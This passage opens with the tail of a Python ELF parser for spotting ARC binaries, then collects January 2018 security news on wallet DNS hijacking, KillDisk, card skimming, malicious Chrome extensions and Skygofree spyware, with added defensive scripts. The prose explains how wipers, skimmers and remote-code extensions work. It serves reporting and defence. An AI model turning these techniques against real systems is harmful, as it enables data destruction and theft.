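EM_ARM = 40            # used here only as a non-ARC comparison value
EM_ARC = 45            # original ARC
EM_ARC_COMPACT = 93    # ARCompact: libmagic prints "ARC Cores Tangent-A5"
EM_ARC_COMPACT2 = 195  # ARCv2
ARC_MACHINES = {
    EM_ARC: "ARC",
    EM_ARC_COMPACT: "ARC Cores Tangent-A5 (ARCompact)",
    EM_ARC_COMPACT2: "ARCv2",
}
PT_INTERP = 3
ELF32_EHDR = "<HHIIIIIHHHHHH"  # fields after the 16-byte e_ident
ELF32_PHDR = "<IIIIIIII"


def parse_elf32(data: bytes) -> dict:
    """Return type, machine, interpreter and an ARC flag for an ELF32 LSB file."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    if data[4] != 1 or data[5] != 1:
        raise ValueError("only ELF32 little-endian is handled in this example")
    (e_type, e_machine, _ver, _entry, e_phoff, _shoff, _flags, _ehsize,
     e_phentsize, e_phnum, _shentsize, _shnum, _shstrndx) = struct.unpack_from(ELF32_EHDR, data, 16)
    interp = None
    for i in range(e_phnum):
        p_type, p_offset, _va, _pa, p_filesz = struct.unpack_from("<IIIII", data, e_phoff + i * e_phentsize)
        if p_type == PT_INTERP:
            interp = data[p_offset:p_offset + p_filesz].rstrip(b"\0").decode("ascii", "replace")
            break
    return {"type": e_type, "machine": e_machine, "interp": interp, "arc": e_machine in ARC_MACHINES}


def describe(info: dict) -> str:
    """Render a one-line summary in the style of `file`."""
    cpu = ARC_MACHINES.get(info["machine"], f"e_machine {info['machine']}")
    kind = {1: "relocatable", 2: "executable", 3: "shared object", 4: "core"}.get(info["type"], "unknown")
    link = f"dynamically linked, interpreter {info['interp']}" if info["interp"] else "statically linked"
    return f"ELF 32-bit LSB {kind}, {cpu}, {link}"


def build_sample_elf(machine: int = EM_ARC_COMPACT) -> bytes:
    """Construct a minimal ELF32 LSB executable with one PT_INTERP program header."""
    interp = b"/lib/ld-uClibc.so.0\0"  # the loader named in the article's `file` output
    ehsize, phentsize = 52, 32
    phoff = ehsize
    interp_off = phoff + phentsize
    ident = b"\x7fELF" + bytes([1, 1, 1, 0]) + bytes(8)  # ELF32, LSB, version 1, SYSV
    header = ident + struct.pack(ELF32_EHDR, 2, machine, 1, 0, phoff, 0, 0,
                                 ehsize, phentsize, 1, 40, 0, 0)
    phdr = struct.pack(ELF32_PHDR, PT_INTERP, interp_off, 0, 0, len(interp), len(interp), 4, 1)
    return header + phdr + interp


if __name__ == "__main__":
    for name, blob in (("arc-sample", build_sample_elf()), ("arm-sample", build_sample_elf(EM_ARM))):
        info = parse_elf32(blob)
        print(f"{name}: {describe(info)} {'<-- ARC target' if info['arc'] else ''}")
```

Run over a directory of samples, this narrows the set to hand to the YARA rule; it does not replace the rule, since e_machine only says what the binary was built for, not what it does.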


Blackwallet hacked, hackers stole $400,000 from users’ accounts through DNS hijacking
17.1.2018 securityaffairs Hacking

BlackWallet.co was the victim of a DNS hijacking attack; on January 13 the attackers stole over $400,000 from users' accounts (roughly 670,000 Lumens).
The spike in cryptocurrency values is attracting cybercriminals. The latest victim is BlackWallet.co, a web-based wallet application for the Stellar Lumen cryptocurrency (XLM).

According to Bleeping Computer, the attackers collected 669,920 Lumens, about $400,192 at the XLM/USD exchange rate at the time.

Stellar Lumen is currently considered the eighth most popular cryptocurrency.

The attackers hijacked the DNS entry of the BlackWallet.co domain and pointed it at a server they operated; as a result of the attack, the application suspended its service.

Users who visited the hijacked domain were served a copy of the site containing injected code; when they entered their keys, the code transferred the funds of any account holding more than 20 Lumens to an attacker-controlled wallet.

Kevin Beaumont (@GossiTheDog), 2:51 AM - Jan 14, 2018: "Blackwallet (web wallet) has apparently been hacked" pic.twitter.com/HhewwBXnD9

Kevin Beaumont (@GossiTheDog), 2:58 AM - Jan 14, 2018: "The DNS hijack of Blackwallet injected code, if you had over 20 Lumens it pushes them to a different wallet." pic.twitter.com/Eiwb8UR1Nn

Well I know now why XLM is dipping

Blackwallet got hacked and the worst part was that I laughed my ass off when reading the reddit…their misery is my gain and for a moment, I felt nothing but joy.

Okay maybe there's something wrong with me.

— Colton Miles (@Omgflamethrower) January 14, 2018

Users on Reddit and other communities promptly spread the news of the hack.

The attackers immediately started moving funds from the XLM account to Bittrex, a cryptocurrency exchange, in an attempt to launder them by converting them into other digital currencies.


The situation is critical; the admins are asking Bittrex to block the attackers' operations before it is too late.

“I am the creator of Blackwallet. Blackwallet was compromised today, after someone accessed my hosting provider account. He then changed the dns settings to those of his fraudulent website (which was a copy of blackwallet).” the Blackwallet creator wrote on Reddit.

“Hacker wallet is: https://stellarchain.io/address/GBH4TZYZ4IRCPO44CBOLFUHULU2WGALXTAVESQA6432MBJMABBB4GIYI

I’ve contacted both SDF and Bittrex to ask them to block the bittrex’s account of the hacker. I’ve contacted my hosting provider to disable my account and my websites.

Hacker sent the funds to a bittrex account. This might lead to an identity.”

orbit84 (@orbit0x54), 3:35 AM - Jan 14, 2018: "Hello @BittrexExchange , please block the account with MEMO XLM 27f9a3e4d954449da04, he hacked https://blackwallet.co/ and is now sending all the funds to your exchange! This is URGENT! A lot of money is involved (>$300,000) https://stellarchain.io/address/GBH4TZYZ4IRCPO44CBOLFUHULU2WGALXTAVESQA6432MBJMABBB4GIYI … https://www.reddit.com/r/Stellar/comments/7q72pw/warning_blackwalletco_hacked_check_your_public_key/?sort=new …"

According to the BlackWallet admin, the incident took place after someone accessed his hosting provider account.

The creator of the web-based wallet application is trying to collect more info about the hack from his hosting provider.

“If you ever entered your key on blackwallet, you may want to move your funds to a new wallet using the stellar account viewer,” he added. “Please note however that blackwallet was only an account viewer and that no keys were stored on the server!” Since the hijacked page was served from the attacker's server, however, any secret key typed into it was exposed to the attacker regardless of what the legitimate server stored.

In December, the popular cryptocurrency exchange EtherDelta suffered a similar incident: a DNS hijack allowed attackers to steal at least 308 ETH ($266,789) as well as a large number of tokens.


Spectre/Meltdown patches had a significant impact on SolarWinds’s AWS infrastructure
17.1.2018 securityaffairs IT

Analysis by SolarWinds of the performance impact of the Spectre/Meltdown patches on its own Amazon Web Services infrastructure revealed serious performance degradation.
SolarWinds, a vendor of IT management and monitoring software, has analyzed the performance impact of the Meltdown and Spectre security patches on its own Amazon Web Services infrastructure.

The results are disconcerting. The company charted the performance of "a Python worker service tier" running on paravirtualized (PV) AWS instances.

CPU usage jumped by roughly 25% as soon as the company rebooted its PV instances ahead of Amazon's maintenance window.

“As you can see from the following chart taken from a Python worker service tier, when we rebooted our PV instances on Dec 20th ahead of the maintenance date, we saw CPU jumps of roughly 25%.” states the analysis published by SolarWinds.

The company also monitored its EC2 HVM instances and noticed a degradation while Amazon was live-patching them against Meltdown.

“AWS was able to live patch HVM instances with the Meltdown mitigation patches without requiring instance reboots. From what we observed, these patches started rolling out about Jan 4th, 00:00 UTC in us-east-1 and completed around 20:00 UTC for EC2 HVM instances in us-east-1. ” continues the analysis.

“CPU bumps like this were noticeable across several different service tiers:”

In summary, packet rates dropped by up to 40% on its Kafka cluster, while CPU utilization rose by around 25 percent on Cassandra.

On Jan 12, 2018, the company published an update noting that CPU utilization had started to fall again.

“As of 10:00 UTC this morning we are noticing a step reduction in CPU usage across our instances. It is unclear if there are additional patches being rolled out, but CPU levels appear to be returning to pre-HVM patch levels.” states the firm.

Mike Heffner (@mheffner), 3:06 PM - Jan 12, 2018: "New EC2 hot patches for Meltdown/Spectre rolling out? Previous CPU bumps appear to be dropping off starting after 10:00 UTC this morning."


New KillDisk variant targets Windows machines in financial organizations in Latin America
17.1.2018 securityaffairs Virus

A new variant of the infamous disk-wiper malware KillDisk has been spotted by malware researchers at Trend Micro targeting financial organizations in Latin America.
This variant, tracked as TROJ_KILLDISK.IUB, was involved in cyber attacks against financial organizations in Latin America; Trend Micro believes it is dropped by another piece of malware or used as a component of a larger attack.

“We came across a new variant of the disk-wiping KillDisk targeting financial organizations in Latin America.” reads a preliminary analysis published by TrendMicro.

“Because KillDisk overwrites and deletes files (and doesn’t store the encryption keys on disk or online), recovering the scrambled files was out of the question.”

KillDisk and the ICS-SCADA malware BlackEnergy were used in the attacks that caused the power outage in Ukraine in December 2015.

In the same period it was also used against mining companies, railways, and banks in Ukraine. KillDisk code was later reused in other malware, including Petya.

In December 2016, researchers at security firm CyberX discovered a variant of the KillDisk malware that implemented ransomware features.

This latest variant targets Windows machines, deleting any file stored on the drives except system files and folders.

“The malware attempts to wipe \\.\PhysicalDrive0 to \\.\PhysicalDrive4. It reads the Master Boot Record (MBR) of every device it successfully opens and proceeds to overwrite the first 0x20 sectors of the device with “0x00”. It uses the information from the MBR to do further damage to the partitions it lists.” states Trend Micro. “If the partition it finds is not an extended one, it overwrites the first 0x10 and last sectors of the actual volume. If it finds an extended partition, it will overwrite the Extended Boot Record (EBR) along with the two extra partitions it points to.”
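For a responder, the practical question raised by that description is which sectors are gone and which can still be carved. The script below is an added example, not Trend Micro's code or the malware's: it parses a raw 512-byte MBR and computes the sector ranges the described routine overwrites (sectors 0 to 0x1F of the device, the first 0x10 and the last sector of each non-extended partition, and the EBR sector of an extended partition; the EBR chain itself lives on disk and is not followed here). The MBR bytes are constructed for the demonstration.

```python
"""Map which sectors the KillDisk routine described above would overwrite.

Added example for this article. Reads the four MBR partition entries and
derives the damaged sector ranges from Trend Micro's description.
"""
import struct

SECTOR = 512
PARTITION_TABLE_OFFSET = 446
ENTRY_FMT = "<B3sB3sII"  # status, CHS start, type, CHS end, LBA start, sector count
EXTENDED_TYPES = {0x05, 0x0F, 0x85}  # CHS extended, LBA extended, Linux extended


def build_sample_mbr() -> bytes:
    """Construct an MBR with one NTFS primary and one LBA-extended partition."""
    mbr = bytearray(SECTOR)
    mbr[:2] = b"\xeb\xfe"  # placeholder boot code: jmp $
    entries = [
        (0x80, b"\x20\x21\x00", 0x07, b"\xfe\xff\xff", 2048, 204800),    # NTFS, 100 MiB
        (0x00, b"\xfe\xff\xff", 0x0F, b"\xfe\xff\xff", 206848, 409600),  # extended (LBA)
    ]
    for i, entry in enumerate(entries):
        off = PARTITION_TABLE_OFFSET + 16 * i
        mbr[off:off + 16] = struct.pack(ENTRY_FMT, *entry)
    mbr[510:512] = b"\x55\xaa"
    return bytes(mbr)


def parse_partitions(mbr: bytes) -> list:
    """Return (type, lba_start, sector_count) for each populated partition entry."""
    if len(mbr) < SECTOR or mbr[510:512] != b"\x55\xaa":
        raise ValueError("not a valid MBR: bad length or missing 0x55AA signature")
    parts = []
    for i in range(4):
        off = PARTITION_TABLE_OFFSET + 16 * i
        _status, _cs, ptype, _ce, lba, count = struct.unpack(ENTRY_FMT, mbr[off:off + 16])
        if ptype != 0 and count != 0:
            parts.append((ptype, lba, count))
    return parts


def killdisk_damage_map(mbr: bytes) -> list:
    """Return (label, first_sector, last_sector) ranges the described wiper overwrites."""
    ranges = [("device head (MBR + first 0x20 sectors)", 0, 0x1F)]
    for ptype, lba, count in parse_partitions(mbr):
        if ptype in EXTENDED_TYPES:
            # The EBR at lba is overwritten; the logical partitions it points to
            # would need the EBR chain read from disk, which is outside this example.
            ranges.append((f"EBR of extended partition type 0x{ptype:02x}", lba, lba))
        else:
            ranges.append((f"first 0x10 sectors of partition type 0x{ptype:02x}", lba, lba + 0x0F))
            last = lba + count - 1
            ranges.append((f"last sector of partition type 0x{ptype:02x}", last, last))
    return ranges


if __name__ == "__main__":
    for label, first, last in killdisk_damage_map(build_sample_mbr()):
        print(f"{label}: sectors {first}-{last}")
```

Everything between those ranges (file system metadata beyond the first 16 sectors, file data) is untouched by this routine, which is why a backup of the MBR and partition boot sectors is usually enough to bring such a disk back; the separate file-deletion pass described in the article is a different matter.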

Once the malware has deleted and overwritten files and folders, it attempts to terminate several processes in order to force the machine to reboot.

The processes it terminates are:

Client/server run-time subsystem (csrss.exe)
Windows Start-Up Application (wininit.exe)
Windows Logon Application (winlogon.exe)
Local Security Authority Subsystem Service (lsass.exe)
Trend Micro is still investigating this new KillDisk variant; in the meantime it invites companies to adopt a "defense in depth" approach, securing gateways, endpoints, networks, and servers.


Customers reporting OnePlus payment website was hacked and reported credit card fraud
17.1.2018 securityaffairs Incident

Several customers of the Chinese smartphone manufacturer OnePlus claim to have been the victims of fraudulent credit card transactions after making purchases on the company's webstore.
A large number of OnePlus users report fraudulent credit card transactions after buying from the official website of the Chinese smartphone manufacturer.

Dozens of cases were reported through the support forum and on Reddit. The fact that the cards were compromised after customers bought a smartphone or accessories from the OnePlus website suggests the site itself was compromised by attackers.

“I purchased two phones with two different credit cards, first on 11-26-17 and second on 11-28-17. Yesterday I was notified on one of the credit cards of suspected fraudulent activity, I logged onto credit card site and verified that there were several transactions that I did not make” claims one of the victims. “The only place that both of those credit cards had been used in the last 6 months was on the Oneplus website.”

Security researchers at Fidus analyzed the payment page after reading the claims on the official forum and discovered that the card-entry form is hosted on OnePlus's own site, so card data passes through its servers and is exposed to attack there.

“We stepped through the payment process on the OnePlus website to have a look what was going on. Interestingly enough, the payment page which requests the customer’s card details is hosted ON-SITE.” reads a blog post published by Fidus. “This means all payment details entered, albeit briefly, flow through the OnePlus website and can be intercepted by an attacker. Whilst the payment details are sent off to a third-party provider upon form submission, there is a window in which malicious code is able to siphon credit card details before the data is encrypted.”


The experts speculate that the company's web servers may have been compromised, possibly through flaws in the Magento eCommerce platform OnePlus used.

Crooks use two methods to steal credit cards from Magento-based stores:

Client-side JavaScript. Malicious JavaScript hosted on the web page silently makes the customer's browser send a crafted request containing the payment data to a server controlled by the attackers. The researchers who analyzed the payment page on the OnePlus site did not find any malicious JavaScript of this kind.
Server-side modification of the app/code/core/Mage/Payment/Model/Method/Cc.php file through shell access to the server. Cc.php handles the saving of card details on the eCommerce site and is called whether or not card details are actually saved, so attackers inject code into this file to siphon the data.
OnePlus declared that it does not store any credit card data on its website and all payment transactions are carried out through a payment processing partner.

“At OnePlus, we take information privacy extremely seriously. Over the weekend, members of the OnePlus community reported cases of unknown credit card transactions occurring on their credit cards post purchase from oneplus.net. We immediately began to investigate as a matter of urgency, and will keep you updated. ” reads the statement published by the company.
“No. Your card info is never processed or saved on our website – it is sent directly to our PCI-DSS-compliant payment processing partner over an encrypted connection, and processed on their secure servers. “
The Chinese smartphone maker also confirmed that purchases made through third-party services like PayPal are not affected.
OnePlus ruled out a Magento vulnerability, stating that since 2014 its website has been entirely rebuilt on custom code.


Canadian man charged over leak of billions hacked accounts through LeakedSource
17.1.2018 securityaffairs Hacking

A Canadian man alleged to be the administrator of LeakedSource.com has been charged over the trafficking of 3 billion hacked account records.
Jordan Evan Bloom (27) was charged in connection with the sale of 3 billion hacked account records through a website that collected personal data and login credentials stolen from breached services.

The man was charged in December, as part of an investigation dubbed “Project Adoration,” with trafficking in personal data, unauthorized use of computers, and possession of property obtained by crime.

The RCMP alleges that Bloom was the administrator of the LeakedSource.com website.

According to a statement from the Royal Canadian Mounted Police, “Project Adoration” began in 2016, after the Canadian police learned that LeakedSource.com was being hosted on servers located in Quebec.

The RCMP conducted the investigation along with The Dutch National Police and the FBI.

According to the RCMP, Bloom earned about C$247,000 (roughly US$198,800) by selling the data via leakedsource.com.

“This investigation is related to claims about a website operator alleged to have made hundreds of thousands of dollars selling personal information,” said Rafael Alvarado, the officer in charge of the RCMP Cybercrime Investigative Team. “The RCMP will continue to work diligently with our domestic and international law enforcement partners to prosecute online criminality.”

The data was stolen during massive data breaches of popular websites such as LinkedIn and Ashley Madison online dating service.

Clearly, the availability of such data puts users at risk of identity theft, especially if they reuse the same credentials across different web services.

Law enforcement shut down Bloom's website; unfortunately, another domain name operated by the man is still online because it is hosted on bulletproof servers in Russia.


Four malicious Chrome extensions affected over half a million users and global businesses
17.1.2018 securityaffairs Virus

Four malicious Chrome extensions may have affected more than half a million users and were likely used to conduct click fraud or black-hat search engine optimization.
More than half a million users may have installed four malicious Chrome extensions that were likely used for click fraud or black-hat SEO.

According to ICEBRG, the malicious extensions also impacted employees of major organizations, potentially allowing attackers to gain access to corporate networks.

“Recently, ICEBRG detected a suspicious spike in outbound network traffic from a customer workstation which prompted an investigation that led to the discovery of four malicious extensions impacting a total of over half a million users, including workstations within major organizations globally.” states the analysis published by ICEBRG. “Although likely used to conduct click fraud and/or search engine optimization (SEO) manipulation, these extensions provided a foothold that the threat actors could leverage to gain access to corporate networks and user information.”

The researchers noticed an unusual spike in outbound traffic from a customer workstation to a European VPS provider. Analysis of the HTTP traffic showed it was directed to the domain ‘change-request[.]info’ and generated by a Chrome extension named Change HTTP Request Header (ID ‘ppmibgfeefcglejjlpeihfdimbkfbbnm’), which was available from Google's Chrome Web Store.


The extension itself does not contain malicious code, but two items of concern in combination allow its author to inject and execute arbitrary JavaScript through it.

The experts point out that Chrome extensions are not allowed, by default, to retrieve JSON from an external source and execute the JavaScript it contains; an extension must explicitly request that capability by relaxing its Content Security Policy (CSP).

Once ‘unsafe-eval’ is enabled, the extension can fetch JSON from a server its author controls and evaluate it, so whoever controls that server can execute arbitrary code in the browser.

“When an extension does enable the ‘unsafe-eval’ (Figure 3) permission to perform such actions, it may retrieve and process JSON from an externally-controlled server. This creates a scenario in which the extension author could inject and execute arbitrary JavaScript code anytime the update server receives a request.” continues the analysis.
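The weak setting is a single line in the extension's manifest, which makes it easy to screen for. The linter below is an added example, not ICEBRG's code or anything from the extensions it analysed: it parses a Manifest V2 content_security_policy string into directives and reports 'unsafe-eval' (which lets fetched text be turned into running code) and any external script host, plus overly broad host permissions. Both manifests are constructed for the demonstration; the hostnames in them are placeholders.

```python
"""Lint a Chrome extension manifest for the CSP weakness described above.

Added example for this article. Reports 'unsafe-eval' and external hosts in
the script-src directive, and broad host permissions.
"""
import json

# Chrome applies this policy when a Manifest V2 extension declares none.
DEFAULT_EXTENSION_CSP = "script-src 'self'; object-src 'self'"
BROAD_HOST_PATTERNS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}

# Constructed manifests: the same extension with a weak and a hardened policy.
WEAK_MANIFEST = json.loads("""{
  "manifest_version": 2,
  "name": "Example Header Changer",
  "version": "1.0",
  "permissions": ["webRequest", "webRequestBlocking", "<all_urls>"],
  "content_security_policy": "script-src 'self' 'unsafe-eval' https://updates.example.invalid; object-src 'self'",
  "background": {"scripts": ["background.js"]}
}""")

HARDENED_MANIFEST = json.loads("""{
  "manifest_version": 2,
  "name": "Example Header Changer",
  "version": "1.1",
  "permissions": ["webRequest", "webRequestBlocking", "https://app.example.invalid/*"],
  "content_security_policy": "script-src 'self'; object-src 'self'",
  "background": {"scripts": ["background.js"]}
}""")


def parse_csp(policy: str) -> dict:
    """Split a CSP string into {directive: [source, ...]}."""
    directives = {}
    for part in policy.split(";"):
        tokens = part.split()
        if tokens:
            directives[tokens[0].lower()] = tokens[1:]
    return directives


def script_sources(csp: dict) -> list:
    """Sources governing script execution: script-src, or default-src as fallback."""
    return csp.get("script-src", csp.get("default-src", ["'self'"]))


def lint_manifest(manifest: dict) -> list:
    """Return human-readable findings for an extension manifest (empty if clean)."""
    findings = []
    csp = parse_csp(manifest.get("content_security_policy", DEFAULT_EXTENSION_CSP))
    sources = script_sources(csp)
    if "'unsafe-eval'" in sources:
        findings.append("script-src allows 'unsafe-eval': fetched text can be executed as code")
    for src in sources:
        if src.startswith("'"):
            continue  # keyword such as 'self' or 'none'
        findings.append(f"script-src trusts external host {src}: remote code can change at any time")
    broad = [p for p in manifest.get("permissions", []) if p in BROAD_HOST_PATTERNS]
    if broad:
        findings.append(f"broad host permissions {broad}: extension can read and modify any site")
    return findings


if __name__ == "__main__":
    for name, manifest in (("weak", WEAK_MANIFEST), ("hardened", HARDENED_MANIFEST)):
        findings = lint_manifest(manifest)
        print(f"{name}: {'clean' if not findings else ''}")
        for finding in findings:
            print("  -", finding)
```

Removing 'unsafe-eval' only closes the door if the extension then treats fetched JSON strictly as data (JSON.parse and field access) rather than as configuration that names code to run; a review of the background script should confirm that.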

The Change HTTP Request Header extension is able to download obfuscated JSON files from an external source (‘change-request[.]info’), by invoking the ‘update_presets()’ function.

The Chrome extension implemented an anti-analysis technique to avoid detection.

The injected JavaScript checks for the presence of native Chrome debugging tools (chrome://inspect/ and chrome://net-internals/) and, if they are detected, halts the injection of the malicious code segment.

Once injected, the JavaScript code creates a WebSocket tunnel to ‘change-request[.]info’ and uses it to proxy browsing traffic via the victim’s browser.

During the analysis, the experts observed that the threat actors used this feature to visit advertising-related domains, likely to conduct click fraud.

“The same capability could also be used by the threat actor to browse internal sites of victim networks, effectively bypassing perimeter controls that are meant to protect internal assets from external parties.” continues the analysis.

The security experts discovered other Chrome extensions with similar behavior that used the same C&C server:

Nyoogle – Custom Logo for Google
Lite Bookmarks
Stickies – Chrome’s Post-it Notes


Powerful Skygofree spyware was reported in November by Lukas Stefanko and first analyzed by CSE CybSec
17.1.2018 securityaffairs Android

The Skygofree spyware analyzed by Kaspersky today was first spotted by the researcher Lukas Stefanko and the first analysis was published last year by the CSE Cybsec ZLab.
Security researchers at Kaspersky Lab have made the headlines because they have spotted a new strain of a powerful Android spyware, dubbed Skygofree, that was used to gain full control of infected devices remotely.

Skygofree is an Android spyware that could be used in targeted attacks and according to the experts it has infected a large number of users for the past four years.

The name Skygofree is not linked to Sky Go, a subsidiary of Sky, and the malware does not affect its services.

The malware has been in the wild at least since 2014, and it was improved several times over the years.

“At the beginning of October 2017, we discovered new Android spyware with several features previously unseen in the wild. In the course of further research, we found a number of related samples that point to a long-term development process. We believe the initial versions of this malware were created at least three years ago – at the end of 2014.” reads the analysis published by Kaspersky.

“Since then, the implant’s functionality has been improving and remarkable new features implemented, such as the ability to record audio surroundings via the microphone when an infected device is in a specified location; the stealing of WhatsApp messages via Accessibility Services; and the ability to connect an infected device to Wi-Fi networks controlled by cybercriminals.”

In this post, I’ll show you that the malware was first found by ESET security researcher Lukas Stefanko and that the first detailed analysis of the spyware (titled “Malware Analysis Report: Fake 3MobileUpdater“) was published by the experts at the CSE Cybsec ZLab.


Lukas Stefanko
@LukasStefanko
The Android Italian Job 🇮🇹

Android Spy Trojan steals sensitive info from victims
Spreads in #Italy 🇮🇹 as fake telecommunication company @Tre_It
Remotely controlled, capable of: install apps, upload files, uses accessibility, take pics, record audio, get sms/location, XMPP...

10:02 AM - Nov 9, 2017
According to Kaspersky, Skygofree has been distributed through fake web pages mimicking leading mobile network operators. The attackers have registered some of the domains used in the attack since 2015.

The most recently observed domain was registered on October 31, 2017. According to Kaspersky data, the malicious code was used against several infected individuals, exclusively in Italy.

In November, the team of researchers at CSE CybSec ZLab analyzed a fake 3 Mobile Updater that posed as a legitimate application from the Italian telco company TRE Italia.

“The most classic and efficient method used to lure the users is to believe that the application does something good. This is just what 3 Mobile Updater does. In fact, this malicious Android application looks like a legitimate app used to retrieve mobile system update and it improperly uses the logo of the notorious Italian Telco company, TRE Italia, in order to trick victims into trusting it.” reads the report published by CSE CybSec.


The analysis conducted by Kaspersky suggests the involvement of an Italian firm due to the presence in the code of strings in Italian.

“As can be seen from the comparison, there are similar strings and also a unique comment in Italian, so it looks like the attackers created this exploit payload based on android-rooting-tools project source code.” states Kaspersky.

The CSE CybSec researchers arrived at the same conclusion; below is a portion of the code analyzed by the members of the ZLab.


“Moreover, both in the logcat messages and in the code, the malware writers used the Italian language. So, we can say with high confidence that this malicious app has been written by an Italian firm that intended to target users of the Italian telco company Tre.” CSE wrote in the analysis.

The artifacts Kaspersky found in the malware code, together with information gathered on the control infrastructure, suggest that the developer of the Skygofree implants is an Italian IT company that develops surveillance solutions.


Kaspersky Lab has not confirmed the name of the Italian company behind this spyware; we at the CSE CybSec ZLab made the same decision in October due to the possible involvement of law enforcement or intelligence agencies.

Unfortunately, the OPSEC implemented by the firm is very poor. The name of the company appears in multiple references in the code. Moreover, one of the control domains registered by the attacker is linked to an Italian technology company.

“Although the security firm has not confirmed the name of the Italian company behind this spyware, it found multiple references to Rome-based technology company “Negg” in the spyware’s code. Negg is also specialized in developing and trading legal hacking tools.” states the blog post published by THN.

Once installed, Skygofree hides its icon and starts background services to conceal its malicious actions from the victim. One interesting feature implemented by the malicious code prevents its services from being killed.

“Interestingly, a self-protection feature was implemented in almost every service. Since in Android 8.0 (SDK API 26) the system is able to kill idle services, this code raises a fake update notification to prevent it” continues Kaspersky.

According to Kaspersky, the Skygofree malware has been enhanced since October, implementing a sophisticated multi-stage attack and using a reverse shell payload.

The malicious code includes multiple exploits to escalate privileges to root, which the attackers use to execute sophisticated payloads, including shellcode used to spy on popular applications such as Facebook, WhatsApp, Line, and Viber.

The same spying abilities were implemented in the app we analyzed at the CSE CybSec.

“The capabilities of this malicious app are enormous and include the information gathering from various sources, including the most popular social apps, including Whatsapp, Telegram, Skype, Instagram, Snapchat. It is able to steal picture from the gallery, SMS and calls registry apps. All this data is first stored in a local database, created by the malicious app, and later it is sent to the C2C.” reads the preliminary analysis published on SecurityAffairs.

“There are multiple, exceptional capabilities: usage of multiple exploits for gaining root privileges, a complex payload structure, [and] never-before-seen surveillance features,” the researchers said.

Skygofree is able to take pictures and videos remotely and to monitor SMS, call records and calendar events; of course, it is also able to gather the target’s location and access any information stored on the device.

Skygofree can also record audio via the microphone. The attacker can also force the victim’s device to connect to compromised Wi-Fi networks under their control in order to conduct man-in-the-middle attacks.

Kaspersky also found a variant of Skygofree targeting Windows users, a circumstance that suggests the same company is also targeting machines running Windows OS.

The best way to prevent yourself from being a victim is to avoid downloading apps via third-party websites, app stores or links provided in SMS messages or emails.

Comparative analysis: fake 3 Mobile Updater vs SkyGoFree

I asked my colleague Dr. Antonio Pirozzi, Director of the CSE CybSec ZLab, to compare the stubs of code shared by Kaspersky with the ones related to the code we analyzed back in November.

This is what has emerged:

These classes are identical:


The spyware we analyzed did not contain the Android exploits found by Kaspersky, nor the PRISM reverse shell and the BusyBox binary.
The classes used for parsing are similar;

The DNS names used are the same;

The IoCs published by Kaspersky include the URL of the C&C (url[.] plus), which is the same as that of the spyware analyzed by CSE CybSec.
Conclusion

Many parts of the code are identical, both source codes include strings in Italian, and the references to the Italian firms are the same. The version analyzed by Kaspersky is a new version of the malware analyzed by CSE CybSec ZLab.
Kaspersky also shared the URLs from which the spyware was downloaded, and one of them was related to the version we analyzed (Fake 3 mobile updater).
The two versions of the malware share numerous classes, the C&C server, Whois records and much other information. The sample analyzed by CSE was probably still under development.


Oracle Fixes Spectre, Meltdown Flaws With Critical Patch Update
17.1.2018 securityweek
Vulnerebility

Oracle on Tuesday released its first Critical Patch Update for 2018 to deliver 237 new security fixes across its product portfolio. Over half of the addressed vulnerabilities could be remotely exploited without authentication.

As part of the January 2018 Critical Patch Update, Oracle released fixes for the critical processor vulnerabilities made public at the beginning of the year, namely Spectre and Meltdown. Impacting modern processors, the bugs put billions of devices at risk, and vendors have been working hard to address them over the past several weeks.

“The January 2018 Critical Patch Update provides fixes for certain Oracle products for the Spectre (CVE-2017-5753, CVE-2017-5715) and Meltdown (CVE-2017-5754) Intel processor vulnerabilities,” Oracle notes in its advisory. Specific details, however, are included in a separate note, accessible only to its customers.

The security updates Oracle released for the Sun Systems Products Suite also include a fix for Oracle X86 Servers to address the CVE-2017-5715 Spectre flaw. The fix “includes Intel microcode that enables OS and VM level mitigations,” but the patch is necessary only for servers using non-Oracle OS and virtualization software.

“Oracle OS and Oracle VM patches for CVE-2017-5715 will include updated Intel microcode,” the company said.

A patch for the same bug was also included in the security updates for Oracle VM VirtualBox.

An article from The Register claims that Oracle admitted in a document on its customer portal that Solaris on SPARCv9 might be impacted by the Spectre flaws. The company reportedly said that patches are being developed, but didn’t provide information on when they would be released or on the performance impact they might have.

The product with the largest number of fixes in the January 2018 Critical Patch Update is Financial Services Applications, at 34 patches. Thirteen of the flaws could be remotely exploited without authentication.

Fusion Middleware was the second most impacted Oracle product, at 27 fixes (21 of the bugs being remotely exploitable without authentication), followed by MySQL (25 fixes – 6 remotely exploitable bugs), Java SE (21 – 18) and Hospitality Applications (21 – 15).

Oracle also resolved bugs in PeopleSoft Products (15 – 8), Supply Chain Products Suite (14 – 12), Virtualization (14 – 3), Sun Systems Products Suite (13 – 7), Retail Applications (11 – 8), Communications Applications (10 – 8), Health Sciences Applications (7 – 5), E-Business Suite (7 – 4), Database Server (5 – 3), Hyperion (4 – 1), Support Tools (3 – 1), JD Edwards Products (2 – 2), Siebel CRM (2 – 0), Construction and Engineering Suite (1 – 0), and Java Micro Edition (1 – 0).

Affecting Apache Log4j, CVE-2017-5645 was the vulnerability with the largest number of occurrences in this set of patches, at 21. It affects Communications Applications, WebLogic Server, PeopleSoft Products, Retail Applications, and Supply Chain Products Suite.

The vulnerability with the highest CVSS score (10) was addressed in Sun ZFS Storage Appliance Kit (AK). The most commonly encountered Critical vulnerabilities had a CVSS score of 9.8. Over 20 such flaws were found in Communications Applications, Fusion Middleware, PeopleSoft, Retail Applications, and Virtualization products.


Backdoor Found in Lenovo, IBM Switches
17.1.2018 securityweek
Virus

A high severity vulnerability described as a backdoor has been patched in several Flex System, RackSwitch and BladeCenter switches from Lenovo and IBM.

The flaw, tracked as CVE-2017-3765, affects the Enterprise Network Operating System (ENOS) running on affected devices. The vulnerability allows an attacker to gain access to the management interface of a switch.

“An authentication bypass mechanism known as ‘HP Backdoor’ was discovered during a Lenovo security audit in the Telnet and Serial Console management interfaces, as well as the SSH and Web management interfaces under certain limited and unlikely conditions,” Lenovo said in its advisory.

“This bypass mechanism can be accessed when performing local authentication under specific circumstances using credentials that are unique to each switch. If exploited, admin-level access to the switch is granted,” the company added.

ENOS is the operating system that powers Lenovo’s RackSwitch and Flex System embedded switches. ENOS was initially developed by Nortel’s Blade Server Switch Business Unit (BSSBU), which spun off in 2006 to become BLADE Network Technologies (BNT). IBM acquired BNT in 2010 and in 2014 sold it to Lenovo.

